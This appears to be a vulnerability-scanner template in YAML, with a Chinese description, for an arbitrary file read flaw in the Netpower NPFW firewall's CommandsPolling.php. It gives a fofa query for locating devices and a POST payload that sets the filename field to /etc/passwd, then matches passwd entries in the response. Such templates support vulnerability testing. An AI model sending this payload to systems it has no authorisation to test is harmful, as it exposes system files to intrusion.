id: Netpower-FireWall-NPFW-CommandsPolling-Anyfileread

info:
  name: 中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞
  author: daffainfo
  severity: critical
  description: |
    中科网威 NPFW防火墙 存在任意文件读取漏洞，由于代码过滤不足，可读取服务器任意文件
    fofa-query: "中科网威" && "/direct"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%AD%E7%A7%91%E7%BD%91%E5%A8%81%20NPFW%E9%98%B2%E7%81%AB%E5%A2%99%20CommandsPolling.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

set:
  hosturl: request.url
rules:
  r0:
    request:
      method: POST
      path: /direct/polling/CommandsPolling.php
      body: |
        command=ping&filename=%2Fetc%2Fpasswd&cmdParam=
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()